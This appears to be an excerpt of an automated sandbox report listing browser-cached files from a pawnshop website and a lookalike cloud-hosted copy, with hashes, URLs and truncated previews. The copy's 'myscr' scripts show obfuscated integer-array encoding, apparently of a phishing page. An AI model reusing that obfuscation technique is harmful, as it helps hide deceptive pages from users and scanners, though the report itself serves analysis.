Size (bytes):	1267
Entropy (8bit):	4.889831308324393
Encrypted:	false
SSDEEP:	24:27bUV0SwD5/8zeDE58zeo2NK1Na6Z1i6v1ol/ryzj8j:27gVby/BDE5BPNOg6/iO1oljyzIj
MD5:	56FE09B498FC1A1441D6D9D4F0634FA4
SHA1:	E1BFD475A866F93C57A3561C2EFC8DD9E11FCA80
SHA-256:	AEF711D1643073AB593DE1D958EE854D6F63339CB216EDA43666FB9DFCEBFFD0
SHA-512:	8C1199B7483B1E1CE014528FCF8F4FD76A7AAC6B8FA19F47132F5C63A86E1C226069ABD1C86C4C1BED475286A2AD37FC0636FE17E2C545EEC754E180D7AEB242
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/plugins/contact-form-7/modules/recaptcha/script.js?ver=5.2.1
Preview:	( function() {..document.addEventListener( 'DOMContentLoaded', function( event ) {....wpcf7_recaptcha.execute = function( action ) {....grecaptcha.execute(.....wpcf7_recaptcha.sitekey,.....{ action: action }....).then( function( token ) {.....var event = new CustomEvent( 'wpcf7grecaptchaexecuted', {......detail: {.......action: action,.......token: token,......},.....} );......document.dispatchEvent( event );....} );...};....wpcf7_recaptcha.execute_on_homepage = function() {....wpcf7_recaptcha.execute( wpcf7_recaptcha.actions[ 'homepage' ] );...};....wpcf7_recaptcha.execute_on_contactform = function() {....wpcf7_recaptcha.execute( wpcf7_recaptcha.actions[ 'contactform' ] );...};....grecaptcha.ready(....wpcf7_recaptcha.execute_on_homepage...);....document.addEventListener( 'change',....wpcf7_recaptcha.execute_on_contactform...);....document.addEventListener( 'wpcf7submit',....wpcf7_recaptcha.execute_on_homepage...);...} );...document.addEventListener( 'wpcf7grecaptchaexecuted', function

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\style[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	assembler source, ASCII text
Category:	downloaded
Size (bytes):	23788
Entropy (8bit):	5.019979681777827
Encrypted:	false
SSDEEP:	384:iHVIM6vlxXX7bgCIW+2u0IAgfHDFfQdF+Fvx5FNXbMHuhZ38R2:0iMWxXX7ETW+2u0IAgfjFfQdF+Fvx5Fr
MD5:	C46460C4F3B7E4A0BC460A0B32B5728C
SHA1:	C164F976948513D8347B3D4E6FCFC61B2593EBAB
SHA-256:	C8927F2EF1F88A242E15BBB8A76BEEFC766B324F8B6F3EC7620BCF86EBA5430C
SHA-512:	A844B90DE77236B96105DF90CFBE23DD51C5BDDC83C04A99062EC7A93FCBFDD481F23AA6710DA330457914614CE890FD7501EE242427F1F7991B885105260B8F
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/plugins/nav-commerce/css/style.css
Preview:	/-- Grid Layout --/../* Extend bootstrap styles to include one-fifth option /./ taken from: http://stackoverflow.com/questions/10387740/five-equal-columns-in-twitter-bootstrap/22799354#22799354 /..col-xs-5ths,..col-sm-5ths,..col-md-5ths,..col-lg-5ths {. position: relative;. min-height: 1px;. padding-right: 10px;. padding-left: 10px;.}...col-xs-5ths {. width: 20%;. float: left;.}.@media (min-width: 768px) {..col-sm-5ths {. width: 20%;. float: left;. }.}.@media (min-width: 992px) {. .col-md-5ths {. width: 20%;. float: left;. }.}.@media (min-width: 1200px) {. .col-lg-5ths {. width: 20%;. float: left;. }.}../ Use the .page-width for 100% width colums /..grid:after {. content: "";. display: table;. clear: both;.}...col {. float: left;.}../ On browsers smaller than 648px make .col 100% /.@media all and (max-width: 648px) {....col { width: 100% !important; }..}../-- Grid Columns --*/...ns-wrapper .one-hal

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\ubuntu-bold-webfont[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 37772, version 1.0
Category:	downloaded
Size (bytes):	37772
Entropy (8bit):	7.983769159497352
Encrypted:	false
SSDEEP:	768:8nj9l9jwtNwsqpx3F9PCIqC+gZKgVp+AVgfr9aXpTjigwy9Qou+Gcs:Qp4tNchPBqC+gE2p++gfIXpTjiXy9Q1n
MD5:	A19A5AAA762A0ED7EF4A3314E6119F91
SHA1:	0834EABEFC2D78E6AF6B5A3FE78F853E2CEF2B21
SHA-256:	A552A146F50DEA919FF2939BFE823DA55D5E2756426F3F3558851A498D7A6C9F
SHA-512:	14E6FB5BEDD604B474AC8825C88F34EB752C0B61D4D893DFAC0B4AE5E46C52EE026314005E8E99FD48E39C1EA6E22A190448B9CAEE286549476B1F96DDCAE317
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/themes/chimera-framework-2017/fonts/ubuntu/ubuntu-bold-webfont.woff
Preview:	wOFF...............X........................FFTM...h........u$..GDEF..b....,...0....GPOS..d........xw.M[GSUB..c.........m..OS/2... ...]...`....cmap................cvt .......N...N....fpgm...@.......eS./.gasp..b.............glyf......T ....-,..head.......6...6..+.hhea....... ...$.A..hmtx.............GD`loca............3.X.maxp........... ...\name..^.........L.M.post..`.......... 3.prep...........'..hRwebf.............)[O.........2._.<...........X.....uU..m.;................x.c`d``..O............@......J.>x.c`d``x.......L..@,...@..#d.h..x.c`f.d......:....Q.B3_d....................B4...8.:2(0..faK............0F..>..@%.....#.a...x.m.OH.Q.....l.q.IH..d.EBbnZ...-!....!2...F.e..9Dx..s`..c.C..u.@<....E.$$.....l....{....~...Q..........Dw..U,.eD.,".......AJ...:c.c....P/u?q.:I...#....d.L.q./g9N.=..@..d..(..2[.x...!...q...jq~.{.S.#.G.........0.f......n..?.8...C.....%.l......}.w.bjl6.....8~..OaQMu..:.-..>c\7.n.*gd...^A...a^o.y......3tz....s..T.r....\...7GoF1j.\_..[S.....y.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\ubuntu-light-webfont[1].woff Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	Web Open Font Format, TrueType, length 35164, version 1.0
Category:	downloaded
Size (bytes):	35164
Entropy (8bit):	7.98482667652559
Encrypted:	false
SSDEEP:	768:axckCabkaBOtnZRFAWSKD25SW7DlT5Xxltll+PzSZEM:YZtbTBORZmKD2jlTd/lGBM
MD5:	B6BF5E9E85B33C8CF567E37709CE0606
SHA1:	059D83FBE271D408B39C367E761F918B20EC9E57
SHA-256:	99BFF17E3AD02B41842F07EEFA79CB0D717F52AAB458D54042A314C305AE4A30
SHA-512:	2637350697311E6C97E1DDA5CFE72DFBED92627AB94C3D74A60C708CC04254A901306FBB989812E47764AA36EF878BEC5473EAC583A0C6D020DA350D16FFDD89
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/themes/chimera-framework-2017/fonts/ubuntu/ubuntu-light-webfont.woff
Preview:	wOFF.......\................................FFTM............v..GDEF.......,...0....GPOS......#.....1_{OGSUB..%..........z..OS/2..&....]...`...qcmap..'.............cvt ..(....2...2.{..fpgm..(........eS./.gasp...............glyf.....V+...D..c.head.......6...6..+.hhea....... ...$.(.ahmtx.......=......]Oloca...P.........y.dmaxp... ... ... ....name...@........=...post..............2.prep..............webf...T.........-[O.................X.....uU.x.c`d``..b. fb`..:.F.z.F .........X.$..._...x..].lU.}?@B.....\.8..8/....B3.J).Q..,K.M3.Fi.(e.Q.!.E..R..P..!.P..c.b..Z.g!.r-.s_.'..\.eY.k...}..s.}.w.O?.u.{t...{........:....EJ..j..[../...G*........}./.P..;..Z....9...%?...P1.n.....R...xw...i._...s.3.X....F..~.$..O.;.l..6...m.~.....a........._..~...Z.6.././...%\|vY5.....j.............5...=...jQO.....G...R....<'...S......=..uJ'...W...=z.....=.sZO/.~..o..o....(.xF..Q..kR.....~p<.....9.;.....sF%0....(.c...T.......a.&e$2>.V..c].....T.L........\|.."m.m.T5...S...-<z.....1....g.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\1103530543356374[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	244047
Entropy (8bit):	5.467940610411289
Encrypted:	false
SSDEEP:	6144:Rk1HWCSntDV/H4K3V/H486EPjQHWuH3H5k:f6Ez
MD5:	3700E5158B975E48AE3D8FF33F2BE73D
SHA1:	69475C8C6F33B3A210B060509507D97FE968B0C4
SHA-256:	EE7366F965AEA6F2F318CF7F26FEB0085CB239453D4FBA4315BAE2F1CE6B2643
SHA-512:	28E472576EE864C8DE9EEE4AE091D934CA8934CE598A66F36EF48FD441D39697F207E1D801FFEB499EEBB377B901B3EC7BF8236B7771A35F6340B66923515C6B
Malicious:	false
Reputation:	low
IE Cache URL:	https://connect.facebook.net/signals/config/1103530543356374?v=2.9.29&r=stable
Preview:	/*. Copyright (c) 2017-present, Facebook, Inc. All rights reserved... You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook... As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Vs6nWS78ghLfsfNsaSX7TbIM18eipulnY6pGcPv__N8[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	22115
Entropy (8bit):	5.645678116161915
Encrypted:	false
SSDEEP:	384:lo+Nsr8yhRy54/AE3bd8LMe1RkKsHydu4eZBl9cpKz:lV6r8yhRy5e8AR4Iz9X
MD5:	3BDA237BDCE57B97F7C04095ACD8C387
SHA1:	15F7A6147D87B7E6C471E45DAAA952D248C299D4
SHA-256:	56CEA7592EFC8212DFB1F36C6925FB4DB20CD7C7A2A6E96763AA4670FBFFFCDF
SHA-512:	7A242E46ADA5B8210A6408765431FAE8CBAF877934B5D7FC42803ABC04C4DF4274691D95890001CBCB9D37EEAAC32826C5D64A1F11509AC3BB8843E406A4055A
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.google.com/js/bg/Vs6nWS78ghLfsfNsaSX7TbIM18eipulnY6pGcPv__N8.js
Preview:	/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t / (function(){var P=function(R,v){if((R=null,v=Z.trustedTypes,!v)\|\|!v.createPolicy)return R;try{R=v.createPolicy("bg",{createHTML:z,createScript:z,createScriptURL:z})}catch(x){Z.console&&Z.console.error(x.message)}return R},z=function(R){return R},Z=this\|\|self;(0,eval)(function(R){return(R=P())&&1===eval(R.createScript("1"))?function(v){return R.createScript(v)}:function(v){return""+v}}()(Array(7824Math.random()\|0).join("\n")+'(function(){var B,R9=function(R,v){return v<R?-1:v>R?1:0},i5=function(R,v){if((R=null,v=u.trustedTypes,!v)\|\|!v.createPolicy)return R;try{R=v.createPolicy("bg",{createHTML:vA,createScript:vA,createScriptURL:vA})}catch(Z){u.console&&u.console.error(Z.message)}return R},K=function(R,v){return v=typeof R,"object"==v&&null!=R\|\|"function"==v},vA=function(R){return R},Zd=function(){},t={},zc,xG=function(R,v){function Z(){}(((R.zV=(Z.prototype=v.prototype,v).prototype,R).prototype=ne

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\chimera-framework[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	8897
Entropy (8bit):	4.682124947805064
Encrypted:	false
SSDEEP:	192:MctX4p1/p3kpFMyyGsgQIrndxNAMJnTUPeShneGm5mCnpL297FCGEMgaQhDZR4:MT1x3kpOWsbuXpi97FTEMgZG
MD5:	0B1D8080F4427194FAC271881702EC68
SHA1:	771C6E8995B6094E46819F9A2FE2BC4360F175C7
SHA-256:	A81DA1599971897BFBC8A6B49B313C5A8B861493AA730E19B6A0CD430DB517F4
SHA-512:	5E90CB5277EC032AA4D8F279C9D8918D411D55F68C02CF9034B97113837B23B5BBAA47792CC023A288436E50B09F2067FCD6F2CAD52285BDBDC7E44BE522C347
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/themes/chimera-framework-2017/js/chimera-framework.js
Preview:	jQuery(document).ready(function($) {.. /*. Adding CSS class to uneditable elements. . /. jQuery(".avatar").addClass("media-object");.. /*. Triggering the WP gallery modal. . /. // This is need to prevent click event spam on the modal. var blnModalOpen = false;. jQuery(".gallery-item").on("click", function() {. var strAltText = jQuery(this).find("img").attr("alt");. var strDataImage = jQuery(this).find("img").data("image");. var intCurrentItem = jQuery(this).closest(".gallery").children().index(jQuery(this)) + 1;. var intTotalItems = jQuery(this).closest(".gallery").find('.gallery-item').length + 1;. var strOutput = "";.. // Set the content of the modal. strOutput += '<img src="' + strDataImage + '" class="img-responsive" alt="' + strAltText + '"/>';. strOutput += '<div class="caption"><p>' + strAltText + '</p></div>';. strOutput += '<a class="controls next" href="' + (intC

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\font-awesome.min[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	31000
Entropy (8bit):	4.746143404849733
Encrypted:	false
SSDEEP:	384:wHu5yWeTUKW+KlkJ5de2UYDyVfwYUas2l8yQ/8dwmaU8G:wwlr+Klk3Yi+fwYUf2l8yQ/e9vf
MD5:	269550530CC127B6AA5A35925A7DE6CE
SHA1:	512C7D79033E3028A9BE61B540CF1A6870C896F8
SHA-256:	799AEB25CC0373FDEE0E1B1DB7AD6C2F6A0E058DFADAA3379689F583213190BD
SHA-512:	49F4E24E55FA924FAA8AD7DEBE5FFB2E26D439E25696DF6B6F20E7F766B50EA58EC3DBD61B6305A1ACACD2C80E6E659ACCEE4140F885B9C9E71008E9001FBF4B
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/themes/chimera-framework-2017/font-awesome/css/font-awesome.min.css
Preview:	/!. Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.7.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.7.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\jquery.js[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
Reputation:	low
IE Cache URL:	https://j123.eu-gb.cf.appdomain.cloud/smain/index_files/jquery.js.download
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\logo-premierPawn-header[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 334 x 40, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	4136
Entropy (8bit):	7.774216814175347
Encrypted:	false
SSDEEP:	48:gAvnLy98J3EZrbcCuKIhXVKWBlNNlDn30bpflCT2XHgwRD/gPkJxItNObE6NCS3/:bsdl4CuK4NF0bpfL5Rsc0iG9apC7W
MD5:	B976D10997FB99579DB2D4D4DC4C6FC4
SHA1:	1F579CBE6BDFDD41B0D9BD7C9B9597349CE387DF
SHA-256:	DE4038A2291CEB2617B24A30BBE92F96FA7AAF1EA14F9CA9BF43AB2DCC125F45
SHA-512:	78BC418F733838715A5B8C2A85FBAEC9ED69078C18D6182CFBC3CC5D7920E6C38764A3695FCA88FF416075521CA7C8E732142BBCF9A4314425F14A8CAA069EDB
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/uploads/2017/08/logo-premierPawn-header.png
Preview:	.PNG........IHDR...N...(.............tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:712facb5-69a3-fc4e-affe-33d074b17615" xmpMM:DocumentID="xmp.did:3DA6386D875311E78116866B758FD0BA" xmpMM:InstanceID="xmp.iid:3DA6386C875311E78116866B758FD0BA" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a426b9c4-cf2e-054d-a069-f4d97d7aab17" stRef:documentID="adobe:docid:photoshop:149c5c1c-7ebe-11e7-931b-cd82eb3716cb"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>J......:IDATx..].u.<.v

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\myscr262639[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	77673
Entropy (8bit):	4.255297675792138
Encrypted:	false
SSDEEP:	1536:ERpgZ3wLS2EN6LYIuBnXnBNeLj5Zum92JVULSA5G:niLNEN6LYzBnXbe/TmBA5G
MD5:	4589B6F7A4970D66890ECC1277CDB69B
SHA1:	1BD2E6D2891CCEB72B376E8127A5B89B8321CD3D
SHA-256:	FA7C98BFAA958B620DC26B384D63A828DB6309C5B60A864EB9CDE28A2B84F741
SHA-512:	C3A24827C686517AB587E071AA4CDA6AE2AEAEE1DCD748D28EDD540C247915D3B16802E1A249A7796C84FF53CFB2E8F9CD2119401BAD98B1821DB211B70F315D
Malicious:	false
Reputation:	low
IE Cache URL:	https://j123.eu-gb.cf.appdomain.cloud/smain/myscr262639.js
Preview:	var erp = new Array;.erp[0] = 218774628;.erp[1] = 1769349219;.erp[2] = 1818325875;.erp[3] = 1025668207;.erp[4] = 1886282102;.erp[5] = 574491914;.erp[6] = 538983521;.erp[7] = 543386721;.erp[8] = 1936932130;.erp[9] = 1633907817;.erp[10] = 1986339360;.erp[11] = 1752327526;.erp[12] = 1025665140;.erp[13] = 1953526586;.erp[14] = 791639927;.erp[15] = 1999532146;.erp[16] = 1701669221;.erp[17] = 1919967607;.erp[18] = 1848533871;.erp[19] = 1831826034;.erp[20] = 1949268088;.erp[21] = 1952591731;.erp[22] = 1751216741;.erp[23] = 1886349678;.erp[24] = 1953705843;.erp[25] = 1751216741;.erp[26] = 1886349678;.erp[27] = 1953705584;.erp[28] = 1752186743;.erp[29] = 1631418227;.erp[30] = 1768386153;.erp[31] = 1848716848;.erp[32] = 643919216;.erp[33] = 997355635;.erp[34] = 1853242673;.erp[35] = 858153325;.erp[36] = 1882940276;.erp[37] = 1026635059;.erp[38] = 959789109;.erp[39] = 858928934;.erp[40] = 1634562107;.erp[41] = 1920361842;.erp[42] = 1027026480;.erp[43] = 775305011;.erp[44] = 925773862;.erp[45] = 1

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\myscr584876[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	20041
Entropy (8bit):	4.390805312794314
Encrypted:	false
SSDEEP:	384:/t1bWD+geYAT4KH0hWGMdPN3syjA9W32F5I2FMB2hPSL:/t1b01oItOPN3sOtlVL
MD5:	9124794063B81F01A30E5E13EDB78A6C
SHA1:	014953194CD9DE5FD48FFDF22D15902BFB20B159
SHA-256:	975E8D22F5DBD1B005FD7AF747A12E96F46876B89CCD9E5B2E2262155B77E6DB
SHA-512:	4370CB648AAE9834F5337DEF0D07FD9506729536D341B7AD39B3477DBBDBDD49AD3F1B20A43A7E11B30285984EA70BAAE80CB6CDD30F983CA9A2B3648A8EF10D
Malicious:	false
Reputation:	low
IE Cache URL:	https://j123.eu-gb.cf.appdomain.cloud/smain/myscr584876.js
Preview:	var erp = new Array;.erp[0] = 1013802356;.erp[1] = 1629513844;.erp[2] = 1953508709;.erp[3] = 1903520118;.erp[4] = 1025655663;.erp[5] = 1853121902;.erp[6] = 1949127801;.erp[7] = 1885676064;.erp[8] = 1668247156;.erp[9] = 1701737533;.erp[10] = 578053496;.erp[11] = 1949263988;.erp[12] = 1835809568;.erp[13] = 1667785074;.erp[14] = 1936028733;.erp[15] = 1431586349;.erp[16] = 941768205;.erp[17] = 168626748;.erp[18] = 1953068140;.erp[19] = 1698583401;.erp[20] = 1735270524;.erp[21] = 542337121;.erp[22] = 1919242351;.erp[23] = 1768846396;.erp[24] = 796158324;.erp[25] = 1818574349;.erp[26] = 171732073;.erp[27] = 1852514418;.erp[28] = 1701592354;.erp[29] = 1768124270;.erp[30] = 572549234;.erp[31] = 1701199138;.erp[32] = 1752462448;.erp[33] = 976170857;.erp[34] = 1668247155;.erp[35] = 778658671;.erp[36] = 1851880035;.erp[37] = 1751742053;.erp[38] = 778268525;.erp[39] = 795435887;.erp[40] = 1853042532;.erp[41] = 1634429298;.erp[42] = 1652110128;.erp[43] = 959411049;.erp[44] = 1836084345;.erp[45] = 7

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\nav-admin-skin[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	4272
Entropy (8bit):	5.02436911565708
Encrypted:	false
SSDEEP:	48:Lip7ZALLlWsdTFjeMKE2uc/jAvwqsxk77zJSoYEMyQqzHG9SoGEkKBLhMk1yBFTx:LiELQETteMQuc7Qwqs67hS8MOPEkKVC
MD5:	17347BED7C52615C61135B829CE6D0C3
SHA1:	1B0477E44E263FE39C20BDC12A0387C48D1DBF53
SHA-256:	2EBEBB104E2719CCB5DD5E021A43B2362CBEDC278E59E60F6D8D454AC8C8474D
SHA-512:	CE02486B71BFA361AA6DBE2D9D708B8E76E754A2E7AA64CB56DA28052ED2081E4ADA499E15E295D1F1F54AD12C77C6BE5F6160EF35EE3AD7A4F67A66084E01DF
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/plugins/nav-admin-skin/nav-admin-skin.css
Preview:	/* ==========================================================================. Login Form Styles. ========================================================================== /../ Login Form Header /..login h1 a {..background: url(images/login-logo.png) no-repeat top center;..background-size: 320px 113px;..height: 113px;..margin: 0 0 0 0;..width: 320px;.}.../ Login Form /..login form {..background: #3aaede;..margin: 0 0 0 0;.}...login label {..color: #FFFFFF;..font-size: 14px;..font-weight:bold;.}...login form .input, .login input[type=text] {..font-size: 14px;..padding: 10px;.}...login input.button-primary,..login input.button-primary:hover {..background:#d22327;..color: #FFFFFF;.}.../ Login form Footer */..login #nav {..background:#d22327;..line-height:32px;..margin: 0 0 0 0;..text-shadow: none;..text-align:center;.}...login #nav a:hover {..background:#d22327;..color: #FFFFFF!important;..font-weight:bold;..text-decoration: none;.}...login #nav a {..color: #FFFFFF!important;..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\scripts[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	15900
Entropy (8bit):	5.036838945990292
Encrypted:	false
SSDEEP:	192:ylS7hDEYzI0kIUu8MDFzxvZ0jzlvp5+J18Oalu0wBSB6yQ4Dm5LsyEkQx6fIY5Y+:hDFIh5Oal3AsR4EkQxhpUB
MD5:	CC43D72A100F2C0FA5BFB44D7AD6A438
SHA1:	26A4B89A709719FA0D24447C9D4541DF6EC24953
SHA-256:	9F32A4FBF9211F5B53F065F26C60FF144F9B3E8B57DDD5DB6E86543559F80F17
SHA-512:	4402FDEB516AF5936C805381B624718E8D29F382FB199CEDA14D898B540FD5AE2E91E5464701205DC4B369205F919BFA163D8C4D929C4D4B09A1DA4C36E5D738
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-content/plugins/nav-commerce/js/scripts.js?ver=1
Preview:	jQuery(document).ready(function($) {..// New Home Page Desktop..if($('.first-level').length){.. $('.single-link').hover(function(){.. $('.first-level').find('ul.dropdown-1').hide();....$('ul.dropdown-1').hide();....$('.first-level').find('a.this-a1').css('background-color','transparent');....$('.first-level').find('a.this-a1').css('color','white');....$('.first-level').find('a.this-a1').css('border-top-right-radius','0px');....$('.first-level').find('a.this-a1').css('border-top-left-radius','0px');.. });.. $('.first-level').hover(function(){.. $('.first-level').find('ul.dropdown-1').hide();. $('.first-level').find('ul.dropdown-1 li.has-level-2').css('background-color','white');. $('.first-level').find('ul.dropdown-1 li.has-level-2 a').css('color','black');. $('.first-level').find('ul.dropdown-1 li.has-not-level-2').css('background-color','white');. $('.first-level').find('ul.dropdown-1 li.has-not-level-2 a').css('color'

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\style.min[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	53593
Entropy (8bit):	4.948825453621659
Encrypted:	false
SSDEEP:	768:fhXMX78Y+AwlxVg7LBRxwGToO/WsVBMnpxDKNqQR7clMYNrG6TZU:JXMXx+AwlxVg7L5N
MD5:	7D2051E6C59F3598B17877BF41637EC4
SHA1:	E3FBC1265F4CD1EACF83C045E4F21D5F9B92BF8D
SHA-256:	BCA7AF0B45B6FC6A2064E8E7A34F2041F3E77261E63F0257209BCDE6BC40545D
SHA-512:	A209A173102949962972952A343883E7FCA567287CAAC581160F6F13A3D7F1984EA97A92AEDB3BFF82765566C88550F9B5C3A8DF0B09E11E4843ECE25AED838F
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.premierpawn.com/wp-includes/css/dist/block-library/style.min.css?ver=5.4.4
